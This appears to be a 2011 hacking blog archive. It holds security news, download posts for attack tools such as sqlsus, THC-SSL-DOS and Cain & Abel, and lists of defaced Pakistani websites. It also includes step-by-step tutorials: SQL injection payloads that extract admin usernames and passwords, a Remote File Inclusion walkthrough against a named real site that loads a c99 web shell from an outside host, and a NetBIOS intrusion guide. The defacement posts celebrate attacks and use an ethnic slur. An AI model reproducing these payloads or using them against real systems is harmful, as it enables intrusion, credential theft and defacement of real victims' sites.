Rabu, 30 November 2011

Twitter Purchases WhisperCore – Full Disk Encryption For Android Phones 21.51

Twitter Purchases WhisperCore – Full Disk Encryption For Android Phones

 Whisper Systems’ offerings include WhisperCore, software that enables full disk encryption as well as management tools for Android phones. It’s free for individual users while enterprise customers pay for the software. Other Whisper Systems products include text encryption, voice encryption, firewall software and encrypted backup.
In a blog post about the acquisition, Whisper Systems didn’t say much about what Twitter might be planning to do with the technology. “Now that we’re joining Twitter, we’re looking forward to bringing our technology and our expertise into Twitter’s products and services,” the company wrote on the blog.
It said that Whisper Systems software will continue to be available but that during a transition period the company will take the products and services offline. In a forum on Whisper Systems’ website, people who are apparently unaware of the acquisition are already wondering why they can’t download products. Twitter did not reply to a request for comment about its plans for the technologies.

The only path I can see, obvious path that is, would be for Twitter to integrate the encryption technology offered by WhisperCore into the official Twitter apps – making them more secure in both storing data locally and in transmitting data over insecure networks.I don’t see how it really offers any value though, it’s not like anyone is actually sending anything important out over Twitter – apart from the odd DM (Direct Message) I would imagine.

It’ll be interesting to see what direction they take though and if we can actually find out why this acquisition took place.
WhisperCore has a number of features designed to make up for security shortcomings in Android. For instance, WhisperCore users can selectively revoke permissions that an app requests while allowing the user to still use the app.
The software also includes a feature aimed at thwarting someone who has stolen a phone from determining the phone’s unlock code based on finger smudges on the screen. Some Android phones display rows of dots and a user unlocks the phone by dragging a finger over certain dots in a set pattern. An attacker might be able to recreate the pattern by examining finger smudges on the screen. WhisperCore displays unlock numbers in a column, so an attacker doesn’t know in which order the user hits the numbers to unlock the phone.Earlier this year Whisper Systems released a software development kit so that developers could start building some WhisperCore features into their applications. Few other companies are doing full disk encryption for Android, although there are many other companies taking other approaches to securing Android phones. Companies like 3LM and Good Technology offer mobile security services for enterprises. In addition, mobile device management products from companies including Sybase, BoxTone, Zenprise, Mobile Iron and Fiberlink let IT managers set basic policies like password requirement and remote wipe, and offer additional security capabilities.
Diposting oleh meg 0 komentar
Label:

Selasa, 29 November 2011

Facebook Hit By Classic Worm Attack 22.55

                           Facebook Hit By Classic Worm Attack
Zeus Trojan spreads when user views 'photos'; Facebook now blocking malicious domains spreading the attack.

A worm spreading via Facebook infects victims with a variant of the dangerous Zeus Trojan. The attack, which was first found by researchers at CSIS in Denmark, spreads via phony posts from an infected Facebook user's account that pretends to contain photos.
Like previous Facebook scams, it uses stolen account credentials to log in and then spam the victim account's "Friends" with the malicious posts. While a screenshot of the file appears to have a .jpg suffix, it's really a malicious screensaver file, according to Jovi Umawing, a security expert at GFI Software.
"The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare." If you are using any virtual machine then it will infect your current OS.
Facebook has blocked the offending domains spreading the Trojan. "We are constantly monitoring the situation and are in the process of blocking domains as we discover them. We have internal systems in place configured specifically to monitor for variations of the spam and are working with others across the industry to pursue both technical and legal avenues to fight the bug," a Facebook spokesperson says. 
"Facebook is built to easily allow people to share pictures, videos, and other content -- and people trust what they are receiving from their friends," says Mike Geide, senior security researcher at Zscaler ThreatLabZ Malware. "[For example], this recent example can take advantage of the sharing mechanisms and user's trust of their friends within social networking."
Meanwhile, new research published today from Norman ASA found that Zeus-based attacks are actually on the decline this year: While there were 20,000 Zeus-related incidents in January, according to Norman, there were "nearly negligible levels" of Zeus threats discovered in September.

Diposting oleh meg 0 komentar
Label: ,

#OpRobinHood : Thousands of United Nation logins leaked by TeaMp0isoN 06.12

#OpRobinHood : Thousands of United Nation logins leaked by TeaMp0isoN



Online "hactivist" collective Anonymous and hackers Team Poison have joined forces for a new group effort known as 'Operation Robin Hood', that plans to target banks in an effort to give money back to the people.

First victim of  Operation Robin Hood was National Bank of Long Island. The hacktivists behind Operation Robin Hood revealed the vulnerabilities present in the website of the First National Bank of Long Island.

TeaMp0isoN today hack United nation website (www.undp.org) and leak 1000's of Login usernames, Passwords and Emails .
Leaked accounts details are posted on pastebin.
Diposting oleh meg 0 komentar
Label: ,

Sabtu, 26 November 2011

Indian Security and Hackers website's got hacked by Shadow008 03.05

Diposting oleh meg 0 komentar
Label: , ,

More then 100 pakistani websites got hacked by ICA 02.41

More then 100 pakistani websites got hacked by ICA




the list of websites are as follow

1) http://mediheal.com.pk/

2) http://unicorngold.pk/

3) http://songstube.pk/

4) http://yman.com.pk/

5) http://nha.gov.pk/

6) http://itl.edu.pk/

7) http://kohatpolice.com/

8) http://pakreliance.com/

9) http://ijazulhaq.com/wp/

10) http://abbottabadonline.com/

11) http://alehsaan.pk/

12) http://akornfoodstuff.com/

13) http://ascop.com.pk/

14) http://makemoneyonlinepk.com/

15) http://wctqee.org/

16) http://lovemusti.com/blog/

17) http://cricketjam.com/

18) http://ayvain.com/

19) http://mobilesshop.pk/

20) http://julwa.com/

21) http://jalway.com/

22) http://moviesindia.pk/

23) http://newsindia.pk/

24) http://photosmoviessongs.com/

25) http://alothman.com/plugins/

26) http://al-kattan.com/images/26.11.html

27) http://acipjo.org/UploadImages/

28) http://songshindimovies.com/

29) http://alf1.com/UploadFile/

30) http://altahergroup.com/UploadImage/

31) http://auptde.org/NewSite/UploadFiles/

32) http://tdcp.gop.pk/tdcp/

33) http://khybercollege.edu.pk/

34) http://rmdm.com.pk/

35) http://pbsa.org.pk/

36) http://yokohama.com.pk/index.php

37) http://gbs.com.pk/

38) http://recruitmenintl.net/

39) http://zeeautomation.com/cwd/schemes.php

40) http://zaitoonpakistan.com/zaitoon/index.php?page_id=1

41) http://karachipressclub.com/

42) http://ict.wfp.org.pk/

43) http://softech.pk/index.php

44) http://bas.edu.pk/

45) http://gcspak.com/

46) http://karachipressclub.com/

47) http://bisesuksindh.edu.pk/

48) http://ciit-atd.edu.pk/index.html

49) http://pakistanpressfoundation.org/

50) http://ajkcouncil.com/

51) http://md-glovespk.com/26.11.html

52) http://aatirgold.com/26.11.html

53) http://kevenimpex.com/26.11.html

54) http://meerabgroup.com/26.11.html

55) http://melbosports.com/26.11.html

56) http://trinestarintl.com/26.11.html

57) http://zolinberg.com//26.11.html

58) http://al-barkat.com/index.html

59) http://lightofquran.net/26.11.html

60) http://jwtpakistan.com/26.11.html

61) http://sdc.gov.pk/index.php

62) http://arshadgroup.com/index.php

63) http://iqrapk.com/

64) http://dilkidunya.com/

65) http://ligamuslim.org/

66) http://abhc.edu.pk/index.php

67) http://abhcg.edu.pk/index.php

68) http://qurban.info/

69) http://fazaweb.com/

70) http://ahmedilyas.com/index.php

71) http://fgmcw.edu.pk/

72) http://rnsfunclub.com/

73) http://iespakistan.org/

74) http://psf-psg.com/

75) http://campus.ti.edu.pk/index.php

76) http://falahpk.org/

77) http://psaviation-psg.com/

78) http://tcdc-psg.com/

79) http://pscs-psg.com/

80) http://sdckarachi.org.pk/

81) http://sal-psg.com/

82) http://aasco.com.pk/index.php

83) http://businessmonitorpk.com/index.html

84) http://lunarsecurity.com.pk/

85) http://mansooryousaf.com/

86) http://webnwebs.com/

87) http://abacus-academy.com/default.html

88) http://alwahid.com.pk/index.php

89) http://al-zahid.net/index.php

90) http://alsiddiqueexports.com.pk/index.php

91) http://alkaram.pk/index.php

92) http://alhabibpackages.com/index.php

93) http://admin.ti.edu.pk/index.php

94) http://aminleather.pk/index.php

95) http://sol.edu.pk/

96) http://greenbushlabel.com/

97) http://nizamiqawwal.com/

98) http://bangush.com/index.php

99) http://azeemcattle.com/default.html

100) http://pakistancyberarmy.com/

101) http://abualhassan.net/

102) http://igoogle.pk/

103) http://software.net.pk/index.php

104) http://www.emezab-e-rehmat.com/index.php

105) http://myuniversity.pk/

107) http://brightstarlibrary.com/index.php

108) http://bideonline.com/

109) http://industrialequipments.com.pk/

110) http://punjabmodaraba.com.pk/

111) http://bunyaadfoundation.org/

112) http://blazingtrailers.com/

113) http://huf.org.pk/

114) http://catsmodelingagency.com/

115) http://www.businessmonitorpk.com/index.html

116) http://pakistanjusticeparty.com/ 
117)http://fasons.com.pk/

118) http://pakshaheen.com.pk/login.html

119) http://bunyaadfoundation.org/

120) http://catsmodelingagency.com/

121) http://businessmonitorpk.com/index.html

122) http://blazingtrailers.com/

123) http://hoteldoveinn.com/index.php

124) http://www.jeco.net.pk/
 If you want to see the mirrors of website then 
click here 
Diposting oleh meg 1 komentar
Label: , ,

More then 111 pakistani websites got hacked by ICA 01.22

More then 111 pakistani websites got hacked by Indian Cyber Army
  
This Mass Deface Cyber Attack is done by Team ICA of www.indishell.in 
We are the only real & first ever INDIAN CYBER ARMY [ICA] made and existing !!
Rest In Peace the Heroes of 26/11 Mumbai Attacks !
We will Never Forgot your sacrifice and We never will let porkis and this world forget it too !
You can see the hacked sites list here.


Diposting oleh meg 0 komentar
Label: , ,

National program for Cyber army to be launched in India 00.01

National program for Cyber army to be launched in India


Increasing attacks on cyberspace in India has brought several professionals and experts from the Industry, in support with the Government of India to jointly form a national level program to identify credible and valuable information security experts. The program "National Security Database" is all set to launch this Saturday in Mumbai at a major Information security conference, MalCon. The database will include ethical hackers and programmers who can protect country’s cyberspace. They will all be registered with the National Security Database, a brainchild of Information Sharing and Analysis Center (ISAC).

The need of such database originated after 2008 attacks in Mumbai when the cyber security professionals realised that a lot needed to be done in the area. "It is observed that some or other form of electronic notification is usually sent before a major terrorist attack, followed by defacement of government web sites. Professional cyber security professionals can make a lot of difference in investigations and help in the entire episode," said Rajshekhar Murthy, director of ISAC. Issue of forming a credible repository of such cyber security professionals who can be trusted with sensitive information can be of use in case of an emergency, and was also raised in a conference held last year.

"After a lot of brainstorming and analysis the database is in place and will be flagged off on November 26 in Mumbai," said Murthy. As per estimates there are over a lakh cyber security experts and hackers in India who as of now function individually. Each one of them has a certain area of specialisation. "They will be brought in to the NSD after a rigourous test which would test their skills. Also they would be made to undergo psychometric tests over and above the tasks that they would have to perform to test their personal skills. Once they clear all levels they would be empaneled in NSD program in applied areas of specialisation," added Murthy. Fraud investigation, web security, mobile security are some of the areas of specialisation in NSD.

The Database, which was secretly being worked on from last two years on invitation only basis has already a sizeable number of experts who have developed malwares and softwares to hack into devices like iPhone and XBox Kinect, which are slated for release at the malware conference MalCon. The database will come in handy each time country is under threat on cyberspace front. "The next generation of attacks will not be only on ground but also on country’s cyberspace," said Murthy citing the example of recent attack on some government computers after which the hackers released sensitive information pertaining to the miltary and communication between India and Moscow.

Companies like QuickHeal and Security Compass among others have already given support to the database and will be hiring security professionals with a direct final interview. "Since NSD professionals will have to go through a tough eight hour lab exam, major companies have written in expressing their interest in hiring NSD empaneled professionals. While NSD does not award certification, we are glad about the support from the Industry" stated Murthy.

The biggest challenge for NSD now is to reach both hackers and professionals and identify them with skills in existing areas of specialization.. "We have already identified several accross the country. Their motivations is that once they are registered with NSD they not only get to upgrade their skills and knowledge but will also be of service to the country. We are collaborating with government agencies looking after cyber security, all of whom are looking forward to the NSD," said Murthy.

The program will be flagged off in the International Malware Conference, MALCON, scheduled to be held at JW Marriott on November 26. Sachin Pilot, Minister of State for Communication and Information Technology is also going to join the conference via video conference from Delhi. His office confirmed that Pilot would share his views on cyber security and extend their endorsement to the National Security Database. Officials from National Technical Research Organisation, a government body which looks at cyber security, too have shown keen interest in the NSD. "It is great initiative which will be of use to the nation and will provide a databse of cyber security professionals," said an NTRO official refusing to be named.
Diposting oleh meg 0 komentar
Label:

Jumat, 25 November 2011

VoIP Hopper 2.01 Released – IP Phone VLAN Hopping Tool 09.00

VoIP Hopper is a GPLv3 licensed security tool, written in C, that rapidly runs a VLAN Hop into the Voice VLAN on specific ethernet switches. VoIP Hopper does this by mimicking the behavior of an IP Phone, in Cisco, Avaya, and Nortel environments.

This requires two important steps in order for the tool to traverse VLANs for unauthorized access. First, discovery of the correct 12 bit Voice VLAN ID (VVID) used by the IP Phones is required. VoIP Hopper supports multiple protocol discovery methods (CDP, DHCP, LLDP-MED, 802.1q ARP) for this important first step. Second, the tool creates a virtual VoIP ethernet interface on the OS. It then inserts a spoofed 4-byte 802.1q vlan header containing the 12 bit VVID into a spoofed DHCP request.

New Features
  • New “Assessment” mode: Interactive, menu driven command interface, improves ability to VLAN Hop in Pentesting when the security tester is working against an unknown network infrastructure
  • New VLAN Discovery methods (802.1q ARP, LLDP-MED)
  • LLDP-MED spoofing and sniffing support
  • Can bypass VoIP VLAN subnet that have DHCP disabled, and spoof the IP address and MAC address of a phone by setting a static IP
download voiphopper-2.01.tar.gz
Diposting oleh meg 0 komentar
Label:

Kamis, 24 November 2011

Web App Pentesting - Pentest Magazine 00.10

                    Web App Pentesting - Pentest Magazine


  • The significance of HTTP and the Web for Advanced Persistent Threats
  • Web Application Security and Penetration Testing
  • Developers are form Wenus, Application Security guys from Mars
  • Pulling legs of Arachni
  • XSS BeeF Metaspolit Exploitation
  • Cross-site request forgery. In-depth analysis
  • First the Security Gate, then the Airplane
Download Magazine
Diposting oleh meg 0 komentar
Label:

PHP Vulnerability Hunter v.1.1.4.6 00.04

PHP Vulnerability Hunter is an advanced automated whitebox fuzz testing tool capable of triggering a wide range of exploitable faults in PHP web applications. Minimal configuration is necessary to begin a scan; PHP Vulnerability Hunter doesn’t even need a user specified starting URI.


Change Log:
  • Added code coverage report
  • Updated GUI validation
  • Several instrumentation fixes
  • Fixed lingering connection issue
  • Fixed GUI and report viewer crashes related to working directory
Diposting oleh meg 0 komentar
Label:

Rabu, 23 November 2011

sqlsus 0.7.1 Released – MySQL Injection & Takeover Tool 05.37

sqlsus is an open source MySQL injection and takeover tool, written in perl. Via a command line interface, you can retrieve the database(s) structure, inject your own sql queries , download files from the web server, crawl the website for writable directories, upload and control a backdoor, clone the database, and much more.Whenever relevant, sqlsus will mimic a MySQL console output.

  • Added time-based blind injection support (added option “blind_sleep”, and renamed “string_to_match” to “blind_string”).
  • It is now possible to force sqlsus to exit when it’s hanging (i.e.: retrieving data), by hitting Ctrl-C more than twice.
  • Rewrite of “autoconf max_sendable”, so that sqlsus will properly detect which length restriction applies. (removed option “max_sendable”, added options “max_url_length” and “max_inj_length”)
  • Uploading a file now sends it into chunks under the length restriction.
  • sqlsus now saves variables after each command, so that forcing it to quit (or killing it) will not discard the changes that were made.
  • Added a progress bar to inband mode, sqlsus now determines the number of rows to be returned prior to fetching them.
  • get db (tables/columns) in inband mode now uses multithreading (like everything else).
  • clone now uses count(*) if available (set by “get count” / “get db”), instead of using fetch-ahead.
  • sqlsus now prints what configuration options are overridden (when a saved value differs from the configuration file).
You can download sqlsus 0.7.1 here:
sqlsus-0.7.1.tgz
Diposting oleh meg 0 komentar
Label: ,

X-Scan by XFocus – Basic Free Network Vulnerability Scanner 05.31

X-Scan is a general scanner for scanning network vulnerabilities for specific IP address range or stand-alone computer by multi-threading method, plug-ins are supported. This is an old tool , but some people still find it useful and there are certain situations where it can be useful.


The following items can be scanned:
  • Remote OS type and version detection,
  • Standard port status and banner information,
  • SNMP information,
  • CGI vulnerability detection,
  • IIS vulnerability detection,
  • RPC vulnerability detection,
  • SSL vulnerability detection,
  • SQL-server,
  • FTP-server,
  • SMTP-server,
  • POP3-server,
  • NT-server weak user/password pairs authentication module,
  • NT server NETBIOS information,
  • Remote Register information, etc.
click here to download X-Scan-v3.3-en.rar
Diposting oleh meg 1 komentar
Label:

Minggu, 20 November 2011

GoLISMERO – Web Application Mapping Tool 00.42

GoLISMERO helps you to map a web application, displaying the results in a readable format for security auditors.


Features
  • Map a web aplication.
  • Show all links and forms params as confortable format.
  • Save results with some formats: text, cvs, html, raw (for parsing with bash script) and wfuzz script.
  • Detect common vulnerabilites of web application.
  • Filter web information retaining only what is important.
  • Many other features you can find very useful.
You can download GoLISMERO here>>

GoLISMERO_last.zip



Diposting oleh meg 0 komentar
Label:

Kamis, 17 November 2011

Acunetix Web Vulnerability Scanner 8 BETA Released for Download 00.17



Acunetix Web Vulnerability Scanner 8 BETA Released for download


Click Here To download 


Diposting oleh meg 0 komentar
Label:

Selasa, 15 November 2011

Hack website using SQL INJECTION 23.49

In this tutorial I am going to Show you how sql injection works and how its useful to get the database from website .

What is SQL Injection ?
Its most common web application venerability. Its allows attacker to execute SQL queries so website got hacked.

There are tow types of sql injection 

1.SQL Injection

2.Blind SQL Injection
So lets start

1.Check for vulnerability
Most famous google dork is "inurl:php?id="
Let’s say that we have some site like this
http://www.site.com/journal.php?id=6
Now to test if is vulrnable we add to the end of url ‘ (quote),
and that would be http://www.site.com/journal.php?id=6′
so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
that means is vulrnable to sql injection

2 Find the number of columns
To find number of columns we use statement ORDER BY (tells database how to order the result)
Now we need to Increase  the number until we get an error like above.
http://www.site.com/journal.php?id=6 order by 1/* <– no error
http://www.site.com/journal.php?id=6 order by 2/* <– no error
http://www.site.com/journal.php?id=6 order by 3/* <– no error
http://www.site.com/journal.php?id=6 order by 4/* <– error (we get message like this Unknown column ‘4′ in ‘order clause’ or something like that)
that means that the it has 3 columns, cause we got an error on 4.

3.Check for UNION function (for finding most venerable number )
http://www.site.com/journal.php?id=6 union all select 1,2,3/*
If you havnt got the number then try adding "-" sign. after id= then url will be become like
http://www.site.com/journal.php?id=-6 union all select 1,2,3/*
if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works

4 Check for MySQL version
http://www.site.com/journal.php?id=6 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try –
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.
it should look like this http://www.site.com/journal.php?id=6 union all select 1,@@version,3/*
if you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
i didn’t see any paper covering this problem, so i must write it
what we need is convert() function
i.e.
http://www.site.com/journal.php?id=6 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
i.e.
http://www.site.com/journal.php?id=6 union all select 1,unhex(hex(@@version)),3/*
and you will get MySQL version

5. Getting table and column name
well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) <— later i will describe for MySQL > 5 version.
we must guess table and column name in most cases.
common table names are: user/s, admin/s, member/s …
common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…
i.e would be
http://www.site.com/journal.php?id=6 union all select 1,2,3 from admin/*
we know that table admin exists.
now to check column names.
http://www.site.com/journal.php?id=6 union all select 1,username,3 from admin/* (we get username displayed on screen, example would be admin, or superadmin etc.
now to check if column password exists
http://www.site.com/journal.php?id=6 union all select 1,password,3 from admin/*
we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1
for that we can use concat() function (it joins strings)
i.e
http://www.site.com/journal.php?id=6 union all select 1,concat(username,0×3a,password),3 from admin/*
Note that i put 0×3a, its hex value for : (so 0×3a is hex value for colon)
(there is another way for that, char(58), ascii value for : )
http://www.site.com/journal.php?id=6 union all select 1,concat(username,char(58),password),3 from admin/*
now we get dislayed username:password on screen, i.e admin:admin or admin:somehash
when you have this, you can login like admin or some superuser
if can’t guess the right table name, you can always try mysql.user (default)
it has user i password columns, so example would be
http://www.site.com/journal.php?id=6 union all select 1,concat(user,0×3a,password),3 from mysql.user/*

6 MySQL 5
Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.
For this we need information_schema. It holds all tables and columns in database.
to get tables we use table_name and information_schema.tables.
i.e
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables/*
here we replace the our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.
i.e
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
note that i put 0,1
now to view the second table, we change limit 0,1 to limit 1,1
i.e
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.
for third table we put limit 2,1
i.e
http://www.site.com/journal.php?id=6 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…
To get the column names the method is the same.
here we use column_name and information_schema.columns
the method is same as above so example would be
http://www.site.com/journal.php?id=6 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
the first column is diplayed.
the second one
ie.
http://www.site.com/journal.php?id=6 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
the second column is displayed, so keep incrementing until you get something like
username,user,login, password, pass, passwd etc…
if you wanna display column names for specific table use this query. (where clause)
let’s say that we found table users.
i.e
http://www.site.com/journal.php?id=6 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*
now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.
we found colums user, pass and email.
now to complete query to put them all together
for that we use concat() , i decribe it earlier.
i.e
http://www.site.com/journal.php?id=6 union all select 1,concat(user,0×3a,pass,0×3a,email) from users/*
what we get here is user:pass:email from table users.
example: admin:hash:whatever@blabla.com
Now find the Admin panel and login as ADMIN :D
Learn More....
Diposting oleh meg 0 komentar
Label: , ,

w3af v1.1 Released For Download – Web Application Attack & Audit Framework 02.51

w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.




Finally it’s out of BETA and RC and there’s now a stable core for the codebase.

New in v1.1
  • Considerably increased performance by implementing gzip encoding
  • Enhanced embedded bug report system using Trac’s XMLRPC
  • Fixed hundreds of bugs
  • Fixed critical bug in auto-update feature
  • Enhanced integration with other tools (bug fixed and addedmore info to the file)
You can download w3af v1.1 here:
w3af-1.1.tar.bz2
Diposting oleh meg 0 komentar
Label:

Senin, 14 November 2011

RFI (Remote File Inclusion) : Website Hacking Tutorial 00.22

Hello friends here i am posting one another method of website hacking called RFI (Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.

Lets Start
1st Step : Find a Vunerable websites using Google Dork
Click here to get more RFI dork
“inurl:index.php?page=” its a  Dork of RFI hacking
It will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com


see example of this website  http://www.cbspk.com

So the hacker url will be look like   
http://www.cbspk.com/v2/index.php?page=http://www.google.com

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.sh3ll.org/c99.zip

Now we need to upload the shells to a webhosting site such as ripway.com, viralhosts.com,110mb.com or another free hosts etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is http://www.sh3ll.org/c99.txt?

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?


Don't Forget To  add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it. 

Learn More website hacking. 
Diposting oleh meg 0 komentar
Label:

Minggu, 13 November 2011

Mozilla hacked by Hmei7 23.26

Diposting oleh meg 0 komentar
Label: ,

How to r00t on server : E-book 23.11

Hello friends here i am sharing one ebook on how to root a server.


Click here to download e book
Diposting oleh meg 0 komentar
Label:

mpf , industrialequipments , gbs ,webnwebs Hacked by Irfninja Indishell (ICF) 22.18

  mpf , industrialequipments , gbs ,webnwebs Hacked by Irfninja Indishell (ICF)



http://www.webnwebs.com
www.gbs.com.pk 
http://www.aoa.org.pk
http://www.industrialequipments.com.pk
www.mpf.com.pk
 
Diposting oleh meg 0 komentar
Label: , ,

4 FAMOUS PAK SITES HACKED LG , HIKARACHI , MY.COM.PK , PBC DUBAI hacked by ICF 22.11

4 FAMOUS PAK SITES HACKED LG , HIKARACHI , MY.COM.PK , PBC DUBAI hacked by Indian cyber force.



http://www.lge.com.pk/
http://www.my.com.pk/
http://www.pbcdubai.com/
http://www.hikarachi.com/
 
Diposting oleh meg 0 komentar
Label: , ,

Pentesting suite for the Nokia N900 10.34

Diposting oleh meg 0 komentar

Sabtu, 12 November 2011

aircrack-ng – WEP and WPA-PSK Key Cracking tool 23.13

aircrack is an 802.11 WEP and WPA-PSK keys cracking tool that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, thus making the attack much faster compared to other WEP cracking tools. In fact, aircrack is a set of tools for auditing wireless networks.

Aircrack-ng is the next generation of aircrack with lots of new features:
  • Better documentation (wiki, manpages) and support (Forum, trac, IRC: #aircrack-ng on Freenode).
  • More cards/drivers supported
  • New WEP attack: PTW
  • More OS and platforms supported
  • Fragmentation attack
  • Improved cracking speed
  • WEP dictionary attack
  • Capture with multiple cards
  • New tools: airtun-ng, packetforge-ng (improved arpforge), wesside-ng and airserv-ng
  • Optimizations, other improvements and bug fixing

Download the latest version of aircrack-ng here:
Linux – aircrack-ng-0.9.1.tar.gz
Windows – aircrack-ng-0.9.1-win.zip
Diposting oleh meg 0 komentar
Label:

Jumat, 11 November 2011

THC SSL DoS/DDoS Tool Released For Download 20.05

This attack further exploits the SSL secure Renegotiation feature to trigger thousands of renegotiations via single TCP connection.


Usage
./thc-ssl-dos 127.3.133.7 443
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

Comparing flood DDoS vs. SSL-Exhaustion attack

This is turned upside down for THC-SSL-DOS: The processing capacity for SSL handshakes is far superior at the client side: A laptop on a DSL connection can challenge a server on a 30Gbit link. Traditional DDoS attacks based on flooding are sub optimal: Servers are prepared to handle large amount of traffic and clients are constantly sending requests to the server even when not under attack.
The SSL-handshake is only done at the beginning of a secure session and only if security is required. Servers are _not_ prepared to handle large amount of SSL Handshakes. The worst attack scenario is an SSL-Exhaustion attack mounted from thousands of clients (SSL-DDoS).
Tips & Tricks for Whitehats
  1. The average server can do 300 handshakes per second. This would require 10-25% of your laptops CPU.
  2. Use multiple hosts (SSL-DOS) if an SSL Accelerator is used.
  3. Be smart in target acquisition: The HTTPS Port (443) is not always the best choice. Other SSL enabled ports are more unlikely to use an SSL Accelerator (like the POP3S, SMTPS, … or the secure database port).
Counter measurements
No real solutions exists. The following steps can mitigate (but not solve) the problem:
  1. Disable SSL-Renegotiation
  2. Invest into SSL Accelerator
Either of these countermeasures can be circumventing by modifying THC-SSL-DOS. A better solution is desireable. Somebody should fix this.


You can download THC-SSL-DOS here:
Windows: thc-ssl-dos-1.4-win-bin.zip
Linux: thc-ssl-dos-1.4.tar.gz
Diposting oleh meg 0 komentar

AnonyOPS.com Hacked By Tha Disastar 10.10


Tha Disastar has Hacked Anonymous's Operation news site. The reason was behind it was that Anonymous where thinking to destroy the Muslims Brotherhood. In return, Indian Hackers and Pakistani Hackers united and targeted AnonyOPS.com . Both Teams worked hard to take it down. Although some Indian Hackers where not Muslims,but they still desiderata to be against it and had told that Anonymous should stay in limits,and must not go out of there limits to others peoples religion.

Site Hacked:
http://anonyops.com/

Mirror:
 http://www.zone-hack.com/defacements/?id=5822
Diposting oleh meg 0 komentar
Label: , ,

Cain & Abel – Download the Super Fast and Flexible Password Cracker with Network Sniffing 06.20

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol’s standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some “non standard” utilities for Microsoft Windows users.


Cain & Abel


Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration tester and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program. Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in the program before using it.

Download Cain & Abel v4.9.4 for Windows NT/2000/XP here:
Cain & Abel 4.9.4 or Cain & Abel 4.9.4 (mirror 1)
Diposting oleh meg 0 komentar

Remote Network Penetration via NetBios Hack/Hacking 06.15

This article is being written in a procedural manner. I have approached it much like an intruder would actually approach a network penetration. Most of the techniques discussed in this text are rather easy to accomplish once one understands how and why something is being done.

When targetting a given network, the first thing an intruder would do, would be to portscan the remote machine or network. A lot of information can be gathered by a simple port scan but what the intruder is looking for is an open port 139 – the Default NetBios port. It’s surprising how methodical an attack can become based on the open ports of a target machine. You should understand that it is the norm for an NT machine to display different open ports than a Unix machine.

Intruders learn to view a portscan and tell wether it is an NT or Unix machine with fairly accurate results. Obviously there are some exceptions to this, but generally it can be done.

Recently, several tools have been released to fingerprint a machine remotely, but this functionality has not been made available for NT.

Information gathering with NetBIOS can be a fairly easy thing to accomplish, albeit a bit time consuming. NetBIOS is generally considered a bulky protocol with high overhead and tends to be slow, which is where the consumption of time comes in.

If the portscan reports that port 139 is open on the target machine, a natural process follows. The first step is to issue an NBTSTAT command.

The NBTSTAT command can be used to query network machines concerning NetBIOS information. It can also be useful for purging the NetBIOS cache and preloading the LMHOSTS file. This one command can be extremely useful when performing security audits.

Interpretation the information can reveal more than one might think.

Usage: nbtstat [-a RemoteName] [-A IP_address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

Switches
   -a    Lists the remote computer's name table given its host name.
   -A    Lists the remote computer's name table given its IP address.
